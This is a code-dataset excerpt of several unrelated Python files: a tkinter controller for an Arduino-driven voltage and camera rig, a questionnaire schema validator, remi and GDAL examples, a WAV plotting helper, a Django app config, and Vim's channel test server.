    Side effects: updates the GUI image label, appends a
    HysteresisImgWrapper (frame + current estimated voltage) to the
    module-level ``imgs`` list, and writes a timestamped PNG into
    ``save_images/`` (folder must already exist next to this script).
    """
    # Takes a single photo of the current view. Blocks for 1sec to ensure proper photo saving.
    print("Saving photo as timestamp to save_images folder (must be in same folder as this script)")
    curDT = datetime.now()
    date_time = curDT.strftime("%m-%d-%Y_%Hh%Mm%Ss")
    # NOTE(review): 1000 is presumably a millisecond grab timeout — confirm against pylon docs.
    result = cam.GrabOne(1000)
    img = result.Array # This is the format we want to save
    # Convert & Resize image for GUI display
    PIL_image = Image.fromarray(np.uint8(img)).convert('RGB')
    PIL_image = PIL_image.resize((900,600))
    tk_image = ImageTk.PhotoImage(master=frame,image=PIL_image)
    imgLbl.config(image=tk_image)
    # Keep a reference on the widget so Tk's garbage collector does not drop the image.
    imgLbl.image = tk_image
    # Add image to our list, tagged with the voltage index mapped to estimated Vpp.
    voltage = voltageMap(voltIndex.get())
    imgs.append(HysteresisImgWrapper(img,voltage))
    # Convert image for automatic saving. Note that we can replace this with a "Save" button in future if we want
    image = converter.Convert(result)
    img = image.GetArray() # This is the format converted to BGR for writing with OpenCV
    cv2.imwrite('save_images/%s.png'%date_time,img)
def voltageMap(voltageIndex):
    """Map a voltage-step index (0-84) to the estimated attainable Vpp.

    The scaling is nonlinear at the low end, so the first nine steps come from
    a hand-measured table; the remaining steps are derived from the Arduino
    PWM duty-cycle range (OCR1A = 38, 25% d.c., up to OCR1A = 144, 90% d.c.).
    Indices outside [0, 84] are clamped to the table bounds. Values remain
    provisional until the whole electrical system is verified in hardware.
    """
    table = [0, 12, 15, 18, 20, 22, 24, 26, 29]
    table += [round(step * 0.95) for step in range(31, 107)]
    clamped = min(max(voltageIndex, 0), 84)
    return table[clamped]
def quit():
    """Shut down cleanly: zero the drive voltage, close the camera, tear down the GUI, exit."""
    # NOTE(review): shadows the builtin quit(); renaming would also require updating
    # the QUIT button's command binding below, so it is left as-is.
    ser.write(bytes([0]))  # command the Arduino back to 0 V before exiting
    cam.Close()
    frame.destroy()
    sys.exit("Exiting")
def incVoltage():
    """Step the voltage index up one notch (capped at 84) and send it to the Arduino."""
    if voltIndex.get() < 84:
        # Note: this prints the pre-increment index value.
        print("Increasing Voltage" + str(voltIndex.get()))
        voltIndex.set(voltIndex.get() + 1)
        voltageTxt.set("Current Vpp (est): " + str(voltageMap(voltIndex.get())))
        ser.write(bytes([voltIndex.get()]))
def decVoltage():
    """Step the voltage index down one notch (floored at 0) and send it to the Arduino."""
    if voltIndex.get() > 0:
        voltIndex.set(voltIndex.get() - 1)
        voltageTxt.set("Current Vpp (est): " + str(voltageMap(voltIndex.get())))
        print("Decreasing Voltage")
        # NOTE(review): both branches send voltIndex (bytes([0]) when it is 0 anyway),
        # so this if/else is redundant but harmless.
        if voltIndex.get() == 0:
            ser.write(bytes([0]))
        else:
            ser.write(bytes([voltIndex.get()]))
# --- Hardware + GUI setup (runs at import time) ---
ser = serial.Serial('com3', 9600)
ser.write(bytes([0]))  # start with the drive voltage at zero
frame = tkinter.Tk()
frame.geometry('1000x800')
frame.title("Cytomech DEP Controller")
lgFont = "Times 20 bold"
# Placeholder grey image shown until the first photo is taken.
PIL_image = np.ones((900,600))*150
tk_image = ImageTk.PhotoImage(master=frame,image=Image.fromarray(PIL_image))
imgLbl = tkinter.Label(frame,image=tk_image,width=900,height=600)
imgLbl.pack()
# Voltage-down button (yellow "-").
decVoltageBtn = tkinter.Button(frame,
                    text="-",
                    font=lgFont,
                    command=decVoltage,
                    height = 2,
                    fg = "black",
                    bg = 'yellow',
                    width = 4,
                    bd = 5,
                    activebackground='white'
                    )
#decVoltageBtn.grid(row=1,column=1,rowspan=2, padx=20, pady=5)
decVoltageBtn.pack(padx = 10, pady = 10, ipadx=10,ipady=10,expand=True,fill='both',side="left")
# Shared Tk variables: current voltage-step index and its display string.
voltageTxt = tkinter.StringVar(master=frame)
voltIndex = tkinter.IntVar(master=frame)
voltIndex.set(0)
voltageTxt.set("Current Vpp (est): 0")
voltLbl = tkinter.Label(frame,textvariable=voltageTxt, width = 15,font=lgFont)
#voltLbl.grid(row=3,column=1,columnspan=3, padx=20, pady=5)
voltLbl.pack(pady = 10,expand=True,fill='both',side="left")
# Voltage-up button (green "+").
incVoltageBtn = tkinter.Button(frame,
                    text="+",
                    font=lgFont,
                    command=incVoltage,
                    height = 2,
                    fg = "black",
                    bg = 'green',
                    width = 4,
                    bd = 5,
                    activebackground='white'
                    )
#incVoltageBtn.grid(row=1,column=3,rowspan=2)
incVoltageBtn.pack(padx = 10, pady = 10,ipadx=10,ipady=10,expand=True,fill='both',side="left")
# Capture button: grabs a frame, displays and saves it (see takePhoto).
photoBtn = tkinter.Button(frame,
                text="Take Photo",
                font=lgFont,
                command=takePhoto,
                height = 2,
                fg = "black",
                bg = '#FF7715',
                width = 10,
                bd = 5,
                activebackground='white'
                )
#photoBtn.grid(row=4,column=1,rowspan=2, padx=20, pady=5)
photoBtn.pack(padx = 10, pady = 10, ipadx=10,ipady=10,expand=True,fill='both',side="left")
# Quit button: zeroes voltage, closes camera and exits (see quit above).
quitButton = tkinter.Button(
    frame,
    text="QUIT",
    font=lgFont,
    command=quit,
    height = 2,
    fg = "black",
    width = 5,
    bg = 'red',
    bd = 5
    )
#quitButton.grid(row=4,column=3,rowspan=2, padx=20, pady=5)
quitButton.pack(padx = 10, pady = 10,ipadx=10,ipady=10,expand=True,fill='both',side="left")
tkinter.mainloop()
6ab64ad7f7106d0ba65d4abb10f71d3123886c67 | 10,488 | py | Python | app/validators/sections/section_validator.py | ONSdigital/eq-questionnaire-validator | 7d2f570a31439c3c4e7d60e1894bfdd859e735a9 | [
"MIT"
] | 1 | 2021-09-10T12:03:02.000Z | 2021-09-10T12:03:02.000Z | app/validators/sections/section_validator.py | ONSdigital/eq-questionnaire-validator | 7d2f570a31439c3c4e7d60e1894bfdd859e735a9 | [
"MIT"
] | 67 | 2020-02-05T11:54:27.000Z | 2022-03-03T12:55:25.000Z | app/validators/sections/section_validator.py | ONSdigital/eq-questionnaire-validator | 7d2f570a31439c3c4e7d60e1894bfdd859e735a9 | [
"MIT"
] | 2 | 2021-04-11T07:45:45.000Z | 2021-04-19T14:52:07.000Z | from collections import defaultdict
from app import error_messages
from app.validators.answers import get_answer_validator
from app.validators.blocks import get_block_validator
from app.validators.questionnaire_schema import get_object_containing_key
from app.validators.questions import get_question_validator
from app.validators.routing.new_routing_validator import NewRoutingValidator
from app.validators.routing.new_when_rule_validator import NewWhenRuleValidator
from app.validators.routing.routing_validator import RoutingValidator
from app.validators.routing.when_rule_validator import WhenRuleValidator
from app.validators.validator import Validator
from app.validators.value_source_validator import ValueSourceValidator
| 39.727273 | 93 | 0.618993 | from collections import defaultdict
from app import error_messages
from app.validators.answers import get_answer_validator
from app.validators.blocks import get_block_validator
from app.validators.questionnaire_schema import get_object_containing_key
from app.validators.questions import get_question_validator
from app.validators.routing.new_routing_validator import NewRoutingValidator
from app.validators.routing.new_when_rule_validator import NewWhenRuleValidator
from app.validators.routing.routing_validator import RoutingValidator
from app.validators.routing.when_rule_validator import WhenRuleValidator
from app.validators.validator import Validator
from app.validators.value_source_validator import ValueSourceValidator
class SectionValidator(Validator):
    """Validate one questionnaire section: repeat/summary lists, groups,
    blocks, questions, variants, routing rules and value sources.

    Errors accumulate on ``self.errors`` (provided by the ``Validator`` base)
    and are all tagged with the section id via ``self.context``.
    """
    def __init__(self, schema_element, questionnaire_schema):
        super().__init__(schema_element)
        self.section = schema_element
        self.questionnaire_schema = questionnaire_schema
        # Tag every error raised by this validator with the owning section id.
        self.context["section_id"] = self.section["id"]
    def validate(self):
        """Run all section-level checks and return the accumulated error list."""
        self.validate_repeat()
        self.validate_summary()
        self.validate_groups()
        self.validate_value_sources()
        return self.errors
    def validate_repeat(self):
        """If the section repeats, its ``for_list`` must be a known list."""
        section_repeat = self.section.get("repeat", None)
        if section_repeat:
            self.validate_list_exists(section_repeat["for_list"])
    def validate_summary(self):
        """Every summary item's ``for_list`` must be a known list."""
        section_summary = self.section.get("summary", None)
        if section_summary:
            for item in section_summary.get("items", []):
                self.validate_list_exists(item.get("for_list"))
    def validate_list_exists(self, list_name):
        """Error if *list_name* is never populated anywhere in the schema."""
        if list_name not in self.questionnaire_schema.list_names:
            self.add_error(error_messages.FOR_LIST_NEVER_POPULATED, list_name=list_name)
    def validate_skip_conditions(self, skip_conditions, origin_id):
        """Validate legacy (list-style) skip conditions with the old when-rule validator."""
        for skip_condition in skip_conditions:
            when_validator = WhenRuleValidator(
                skip_condition["when"], origin_id, self.questionnaire_schema
            )
            self.errors += when_validator.validate()
    def validate_new_skip_conditions(self, skip_condition, origin_id):
        """Validate a new-style (dict) skip condition with the new when-rule validator."""
        when_validator = NewWhenRuleValidator(
            skip_condition["when"], origin_id, self.questionnaire_schema
        )
        self.errors += when_validator.validate()
    def validate_value_sources(self):
        """Validate every value-source reference found anywhere under this section."""
        # Any object containing an "identifier" key is a candidate source reference.
        source_references = get_object_containing_key(self.section, "identifier")
        for json_path, source_reference in source_references:
            if "source" in source_reference:
                value_source_validator = ValueSourceValidator(
                    value_source=source_reference,
                    json_path=json_path,
                    questionnaire_schema=self.questionnaire_schema,
                )
                self.errors += value_source_validator.validate()
    def validate_groups(self):
        """Validate routing for each group, then all blocks inside it."""
        for group in self.section["groups"]:
            self.validate_routing(group, group)
            self.validate_blocks(group["id"])
    def validate_blocks(self, group_id):
        """Validate routing, block rules, question and variants for each block in the group."""
        group = self.questionnaire_schema.get_group(group_id)
        for block in group.get("blocks"):
            self.validate_routing(block, group)
            block_validator = get_block_validator(block, self.questionnaire_schema)
            self.errors += block_validator.validate()
            self.validate_question(block)
            self.validate_variants(block)
    def validate_routing(self, schema_element, group):
        """Validate routing rules and skip conditions on a group or block.

        The presence of "goto" distinguishes legacy routing rules from the
        new rule format; list vs dict distinguishes legacy vs new skip
        conditions.
        """
        if "routing_rules" in schema_element:
            if any("goto" in rule for rule in schema_element["routing_rules"]):
                routing_validator = RoutingValidator(
                    schema_element, group, self.questionnaire_schema
                )
            else:
                routing_validator = NewRoutingValidator(
                    routing_rules=schema_element["routing_rules"],
                    group=group,
                    origin_id=schema_element["id"],
                    questionnaire_schema=self.questionnaire_schema,
                )
            self.errors += routing_validator.validate()
        if "skip_conditions" in schema_element:
            if isinstance(schema_element["skip_conditions"], list):
                self.validate_skip_conditions(
                    schema_element["skip_conditions"], schema_element["id"]
                )
            elif isinstance(schema_element["skip_conditions"], dict):
                self.validate_new_skip_conditions(
                    schema_element["skip_conditions"], schema_element["id"]
                )
    def validate_question(self, block_or_variant):
        """Validate a block's (or variant's) question and each of its answers."""
        question = block_or_variant.get("question")
        if question:
            question_validator = get_question_validator(question)
            self.errors += question_validator.validate()
            for answer in question.get("answers", []):
                answer_validator = get_answer_validator(
                    answer, self.questionnaire_schema
                )
                answer_validator.validate()
                # Question-level summaries only support a limited set of answer types.
                if question.get("summary") and answer["type"] not in [
                    "TextField",
                    "Checkbox",
                    "Number",
                ]:
                    self.add_error(
                        # NOTE(review): constant name carries a triple-P typo;
                        # presumably spelled this way in error_messages — confirm.
                        error_messages.UNSUPPPORTED_QUESTION_SUMMARY_ANSWER_TYPE,
                        answer_id=answer["id"],
                    )
                self.errors += answer_validator.errors
    def validate_variants(self, block):
        """Validate question/content variants and their when-rules for a block."""
        question_variants = block.get("question_variants", [])
        content_variants = block.get("content_variants", [])
        all_variants = question_variants + content_variants
        for variant in question_variants:
            self.validate_question(variant)
        # This is validated in json schema, but the error message is not good at the moment.
        if len(question_variants) == 1 or len(content_variants) == 1:
            self.add_error(
                error_messages.VARIANTS_HAS_ONE_VARIANT, block_id=block["id"]
            )
        for variant in all_variants:
            when_clause = variant.get("when", [])
            when_validator = WhenRuleValidator(
                when_clause, block["id"], self.questionnaire_schema
            )
            self.errors += when_validator.validate()
        self.validate_variant_fields(block, question_variants)
    def validate_variant_fields(self, block, variants):
        """ Ensure consistency between relevant fields in variants
        - Ensure that question_ids are the same across all variants.
        - Ensure answer_ids are the same across all variants.
        - Ensure question types are the same across all variants.
        - Ensure answer types are the same across all variants.
        - Ensure default answers are the same across all variants.
        """
        if not variants:
            return
        results = self._get_question_variant_fields_sets(variants)
        if len(results["number_of_answers"]) > 1:
            self.add_error(
                error_messages.VARIANTS_HAVE_DIFFERENT_ANSWER_LIST_LENGTHS,
                block_id=block["id"],
            )
        if len(results["question_ids"]) != 1:
            self.add_error(
                error_messages.VARIANTS_HAVE_DIFFERENT_QUESTION_IDS,
                block_id=block["id"],
                question_ids=results["question_ids"],
            )
        if len(results["question_types"]) != 1:
            self.add_error(
                error_messages.VARIANTS_HAVE_MULTIPLE_QUESTION_TYPES,
                block_id=block["id"],
                question_types=results["question_types"],
            )
        if len(results["default_answers"]) > 1:
            self.add_error(
                error_messages.VARIANTS_HAVE_DIFFERENT_DEFAULT_ANSWERS,
                block_id=block["id"],
                question_ids=results["question_ids"],
            )
        # All variants must agree on the exact same set of answer ids.
        if len(results["answer_ids"]) != next(iter(results["number_of_answers"])):
            self.add_error(
                error_messages.VARIANTS_HAVE_MISMATCHED_ANSWER_IDS,
                block_id=block["id"],
                answer_ids=results["answer_ids"],
            )
        for answer_id, type_set in results["answer_types"].items():
            if len(type_set) != 1:
                self.add_error(
                    error_messages.VARIANTS_HAVE_MISMATCHED_ANSWER_TYPES,
                    block_id=block["id"],
                    answer_types=type_set,
                    answer_id=answer_id,
                )
    @staticmethod
    def _get_question_variant_fields_sets(variants):
        """Collect the id/type/default sets used by validate_variant_fields."""
        results = {
            "question_ids": set(),
            "question_types": set(),
            "answer_ids": set(),
            "answer_types": defaultdict(set),
            "default_answers": set(),
            "number_of_answers": set(),
        }
        for variant in variants:
            question_variant = variant["question"]
            results["question_ids"].add(question_variant["id"])
            results["question_types"].add(question_variant["type"])
            for answer in question_variant["answers"]:
                results["answer_ids"].add(answer["id"])
                results["answer_types"][answer["id"]].add(answer["type"])
                results["default_answers"].add(answer.get("default"))
            # Record the cumulative distinct-answer-id count after each variant;
            # more than one value here means the variants' answer lists diverge.
            results["number_of_answers"].add(len(results["answer_ids"]))
        # Code to handle comparison of variants which contain a MutuallyExclusive answer type
        if (
            len(results["question_types"]) > 1
            and "MutuallyExclusive" in results["question_types"]
        ):
            results["question_types"].remove("MutuallyExclusive")
            results["answer_ids"].clear()
            results["number_of_answers"].clear()
            for variant in variants:
                if variant["question"]["type"] == "MutuallyExclusive":
                    # Only the first (non-exclusive) answer counts for comparison.
                    non_exclusive_answer = variant["question"]["answers"][0]
                    results["answer_ids"].add(non_exclusive_answer["id"])
                else:
                    for answer in variant["question"]["answers"]:
                        results["answer_ids"].add(answer["id"])
                results["number_of_answers"].add(len(results["answer_ids"]))
        return results
| 7,144 | 2,590 | 23 |
47fe2037f0c7cb92585e4d15d11841e6a8393752 | 1,362 | py | Python | examples/selection_input_app.py | zelogik/remi | 074f0e856d1634a0a8155626d8dd2135feb99544 | [
"Apache-2.0"
] | 3,224 | 2015-10-30T15:35:05.000Z | 2022-03-08T19:31:46.000Z | examples/selection_input_app.py | Ksengine/remi | 4ccb06581a70c101807b740ef587065aa70b17ce | [
"Apache-2.0"
] | 453 | 2015-10-26T17:39:01.000Z | 2022-03-07T13:57:18.000Z | examples/selection_input_app.py | Ksengine/remi | 4ccb06581a70c101807b740ef587065aa70b17ce | [
"Apache-2.0"
] | 458 | 2015-11-03T12:08:01.000Z | 2022-03-09T00:17:19.000Z | """
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import remi.gui as gui
from remi import start, App
import os
if __name__ == "__main__":
# starts the webserver
start(MyApp, address='0.0.0.0', port=0, start_browser=True, username=None, password=None)
| 35.842105 | 108 | 0.701909 | """
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import remi.gui as gui
from remi import start, App
import os
class MyApp(App):
    """Minimal remi app: a dropdown whose selection is echoed into a label."""
    def main(self):
        """Build and return the root widget tree."""
        # Root layout container, centered horizontally.
        root = gui.VBox(width=300, height=200, style={'margin': '0px auto'})
        status = gui.Label("Select a fruit")
        chooser = gui.SelectionInputWidget(['banana', 'apple', 'pear', 'apricot'], 'banana', 'text')
        def on_choice(emitter, value):
            # Echo the chosen value into the label.
            status.set_text("event oninput: %s" % value)
        chooser.oninput.do(on_choice)
        root.append([status, chooser])
        # remi renders whatever widget main() returns.
        return root
if __name__ == "__main__":
    # starts the webserver
    # port=0 lets the OS pick a free port; start_browser opens the UI automatically.
    start(MyApp, address='0.0.0.0', port=0, start_browser=True, username=None, password=None)
| 545 | -4 | 49 |
1e2d84940a05efd0cc8e5fbe8f9be589dfffd985 | 543 | py | Python | Chapter06/B13346_06_01-swap.py | shahidnawazkhan/geog786course | e2d425875d183af3f0d5d54bb7c01033f5b2926f | [
"MIT"
] | 97 | 2019-06-21T21:59:23.000Z | 2022-03-30T17:00:46.000Z | Chapter06/B13346_06_01-swap.py | Fall-in-love-with-Kikyo/Learning-Geospatial-Analysis-with-Python-Third-Edition | 5f4961837d762cffbf67338e0237313ea89dbb48 | [
"MIT"
] | 3 | 2021-10-19T02:31:15.000Z | 2022-01-18T04:45:07.000Z | Chapter06/B13346_06_01-swap.py | Fall-in-love-with-Kikyo/Learning-Geospatial-Analysis-with-Python-Third-Edition | 5f4961837d762cffbf67338e0237313ea89dbb48 | [
"MIT"
] | 61 | 2019-04-07T22:53:30.000Z | 2022-03-28T03:01:11.000Z | """Swap bands in a raster satellite image"""
# http://git.io/vqs41
from gdal import gdal_array
# name of our source image
src = "FalseColor.tif"
# load the source image into an array
arr = gdal_array.LoadFile(src)
# swap bands 1 and 2 for a natural color image.
# We will use numpy "advanced slicing" to reorder the bands.
# Using the source image
output = gdal_array.SaveArray(arr[[1, 0, 2], :], "swap.tif",
format="GTiff", prototype=src)
# Dereference output to avoid corrupted file on some platforms
output = None | 28.578947 | 62 | 0.703499 | """Swap bands in a raster satellite image"""
# http://git.io/vqs41
from gdal import gdal_array
# name of our source image
src = "FalseColor.tif"
# load the source image into an array
# NOTE(review): for a multiband raster this presumably yields a (bands, rows, cols)
# array — confirm against the GDAL gdal_array docs.
arr = gdal_array.LoadFile(src)
# swap bands 1 and 2 for a natural color image.
# We will use numpy "advanced slicing" to reorder the bands.
# Using the source image as the prototype copies its georeferencing/projection.
output = gdal_array.SaveArray(arr[[1, 0, 2], :], "swap.tif",
                              format="GTiff", prototype=src)
# Dereference output to avoid corrupted file on some platforms
# (dropping the last reference forces GDAL to flush and close the dataset).
output = None
768377607dcaeb9485796c28ca8047ebf64714e5 | 2,398 | py | Python | analysisTools/plot_builder.py | anastasiia-kornilova/sound_direction | ad7e5eec2d9f3417bb6996d088edd88e1ea5acc0 | [
"Apache-2.0"
] | 1 | 2021-02-04T11:02:11.000Z | 2021-02-04T11:02:11.000Z | analysisTools/plot_builder.py | anastasiia-kornilova/sound_direction | ad7e5eec2d9f3417bb6996d088edd88e1ea5acc0 | [
"Apache-2.0"
] | null | null | null | analysisTools/plot_builder.py | anastasiia-kornilova/sound_direction | ad7e5eec2d9f3417bb6996d088edd88e1ea5acc0 | [
"Apache-2.0"
] | 1 | 2018-10-14T16:07:01.000Z | 2018-10-14T16:07:01.000Z | import os
import matplotlib.pyplot as plt
import scipy.io.wavfile as wav
from runner import Runner
| 33.774648 | 99 | 0.537114 | import os
import matplotlib.pyplot as plt
import scipy.io.wavfile as wav
from runner import Runner
class PlotBuilder(object):
    """Builds and saves a 4-panel diagnostic figure for a stereo WAV recording:
    left channel, right channel, energy/VAD curve, and estimated angle.
    """
    # Filename prefix and extension for the saved figures.
    __angle_plt_name = 'angle_'
    __plt_ext = '.png'
    def __init__(self):
        pass
    def plot_sensor_out(self, data, params, destdir):
        """Render the figure for one test run and save it into *destdir*.

        data: dict with per-window series 'vad' and 'angle'.
        params: dict with 'input_filename', 'window_size' (samples) and
            'history_depth' (currently only used by the commented-out caption).
        destdir: directory the PNG is written to.
        """
        test_path = params['input_filename']
        test_name = os.path.splitext(os.path.basename(test_path))[0]
        window_size = params['window_size']
        history_depth = params['history_depth']
        rate, wavdata = wav.read(test_path)
        # Stereo file: column 0 is the left channel, column 1 the right.
        left_chl = wavdata[:, 0]
        right_chl = wavdata[:, 1]
        fig, plts = plt.subplots(4, 1, sharex=True)
        fig.set_size_inches(14., 10.)
        xlen = len(left_chl)
        pcm_range = range(int(-3 * 1e4), int(4 * 1e4), int(1e4))
        # plts[0].axis([0, xlen, -2e15, 2e15])
        plts[0].set_title('Left channel')
        plts[0].set_yticks(pcm_range)
        plts[0].plot(left_chl, color='blue', linestyle='-')
        # plts[1].axis([0, xlen, -2e15, 2e15])
        plts[1].set_title('Right channel')
        plts[1].set_yticks(pcm_range)
        plts[1].plot(right_chl, color='blue', linestyle='-')
        # One x-position per analysis window, truncated to the angle series length.
        wdots = range(0, xlen + window_size, window_size)
        wdots = wdots[:len(data['angle'])]
        # plts[2].axis([0, xlen, 0, 1e-1])
        plts[2].set_title('Energy')
        plts[2].plot(wdots, data['vad'], color='red', linestyle='-')
        plts[3].axis([0, xlen, -90, 90])
        plts[3].set_title('Angle')
        plts[3].set_xlabel('Sample')
        plts[3].set_ylabel('Degree')
        plts[3].set_yticks(range(-90, 100, 30))
        plts[3].grid(True)
        plts[3].plot(wdots, data['angle'], color='green', linestyle='-')
        #
        # text = ('Test name: {tn} {sep}'
        #         'Window size = {ws} samples {sep}'
        #         'Hisory depth = {hd} windows {sep}'.format(tn=test_name,
        #                                                    ws=window_size,
        #                                                    hd=history_depth,
        #                                                    sep=os.linesep))
        # plts[3].text(1, -120, text, bbox=dict(boxstyle='square,pad=0.3', ec='black', fc='white'))
        figname = self.__angle_plt_name + test_name + self.__plt_ext
        figname = os.path.join(destdir, figname)
        fig.savefig(figname)
        # Close the figure explicitly so repeated calls don't leak memory.
        plt.close(fig)
| 2,160 | 115 | 23 |
5818f6b495fd1bcb0df047fec6725a29b0d28423 | 131 | py | Python | photo/apps.py | ruslan-ok/ruslan | fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8 | [
"MIT"
] | null | null | null | photo/apps.py | ruslan-ok/ruslan | fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8 | [
"MIT"
] | null | null | null | photo/apps.py | ruslan-ok/ruslan | fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
from photo.config import app_config
| 21.833333 | 35 | 0.78626 | from django.apps import AppConfig
from photo.config import app_config
class PhotoConfig(AppConfig):
    """Django application configuration for the photo app.

    The app name is read from photo.config's app_config mapping.
    """
    name = app_config['name']
| 0 | 38 | 23 |
6b2947d904a12699c53f85fd20cfcef2e48e9a84 | 12,015 | py | Python | src/testdir/test_channel.py | chestnut1693/vim | bc38f25c021dc4314c77d50a608329a328b0d988 | [
"Vim"
] | 2 | 2020-04-13T04:53:59.000Z | 2020-06-01T14:41:02.000Z | src/testdir/test_channel.py | chestnut1693/vim | bc38f25c021dc4314c77d50a608329a328b0d988 | [
"Vim"
] | null | null | null | src/testdir/test_channel.py | chestnut1693/vim | bc38f25c021dc4314c77d50a608329a328b0d988 | [
"Vim"
] | null | null | null | #!/usr/bin/env python
#
# Server that will accept connections from a Vim channel.
# Used by test_channel.vim.
#
# This requires Python 2.6 or later.
from __future__ import print_function
import json
import socket
import sys
import time
import threading
try:
# Python 3
import socketserver
except ImportError:
# Python 2
import SocketServer as socketserver
if __name__ == "__main__":
main("localhost", 0)
| 44.335793 | 94 | 0.424303 | #!/usr/bin/env python
#
# Server that will accept connections from a Vim channel.
# Used by test_channel.vim.
#
# This requires Python 2.6 or later.
from __future__ import print_function
import json
import socket
import sys
import time
import threading
try:
# Python 3
import socketserver
except ImportError:
# Python 2
import SocketServer as socketserver
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
    """Handles one Vim channel connection.

    Reads newline-separated JSON messages of the form [seq, payload] and
    dispatches on the payload string. The exact command strings sent back
    are part of the test protocol and must not be altered.
    """
    def handle(self):
        print("=== socket opened ===")
        while True:
            try:
                received = self.request.recv(4096).decode('utf-8')
            except socket.error:
                print("=== socket error ===")
                break
            except IOError:
                print("=== socket closed ===")
                break
            if received == '':
                print("=== socket closed ===")
                break
            print("received: {0}".format(received))
            # We may receive two messages at once. Take the part up to the
            # newline, which should be after the matching "]".
            todo = received
            while todo != '':
                splitidx = todo.find('\n')
                if splitidx < 0:
                    used = todo
                    todo = ''
                else:
                    used = todo[:splitidx]
                    todo = todo[splitidx + 1:]
                if used != received:
                    print("using: {0}".format(used))
                try:
                    decoded = json.loads(used)
                except ValueError:
                    print("json decoding failed")
                    decoded = [-1, '']
                # Send a response if the sequence number is positive.
                if decoded[0] >= 0:
                    if decoded[1] == 'hello!':
                        # simply send back a string
                        response = "got it"
                    elif decoded[1] == 'malformed1':
                        cmd = '["ex",":"]wrong!["ex","smi"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                        # Need to wait for Vim to give up, otherwise it
                        # sometimes fails on OS X.
                        time.sleep(0.2)
                    elif decoded[1] == 'malformed2':
                        cmd = '"unterminated string'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                        # Need to wait for Vim to give up, otherwise the double
                        # quote in the "ok" response terminates the string.
                        time.sleep(0.2)
                    elif decoded[1] == 'malformed3':
                        cmd = '["ex","missing ]"'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                        # Need to wait for Vim to give up, otherwise the ]
                        # in the "ok" response terminates the list.
                        time.sleep(0.2)
                    elif decoded[1] == 'split':
                        # Deliberately send one command split across two writes.
                        cmd = '["ex","let '
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        time.sleep(0.01)
                        cmd = 'g:split = 123"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1].startswith("echo "):
                        # send back the argument
                        response = decoded[1][5:]
                    elif decoded[1] == 'make change':
                        # Send two ex commands at the same time, before
                        # replying to the request.
                        cmd = '["ex","call append(\\"$\\",\\"added1\\")"]'
                        cmd += '["ex","call append(\\"$\\",\\"added2\\")"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'bad command':
                        cmd = '["ex","foo bar"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'do normal':
                        # Send a normal command.
                        cmd = '["normal","G$s more\u001b"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'eval-works':
                        # Send an eval request. We ignore the response.
                        cmd = '["expr","\\"foo\\" . 123", -1]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'eval-special':
                        # Send an eval request. We ignore the response.
                        cmd = '["expr","\\"foo\x7f\x10\x01bar\\"", -2]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'eval-getline':
                        # Send an eval request. We ignore the response.
                        cmd = '["expr","getline(3)", -3]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'eval-fails':
                        # Send an eval request that will fail.
                        cmd = '["expr","xxx", -4]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'eval-error':
                        # Send an eval request that works but the result can't
                        # be encoded.
                        cmd = '["expr","function(\\"tr\\")", -5]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'eval-bad':
                        # Send an eval request missing the third argument.
                        cmd = '["expr","xxx"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'an expr':
                        # Send an expr request.
                        cmd = '["expr","setline(\\"$\\", [\\"one\\",\\"two\\",\\"three\\"])"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'call-func':
                        cmd = '["call","MyFunction",[1,2,3], 0]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'redraw':
                        cmd = '["redraw",""]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'redraw!':
                        cmd = '["redraw","force"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'empty-request':
                        cmd = '[]'
                        print("sending: {0}".format(cmd))
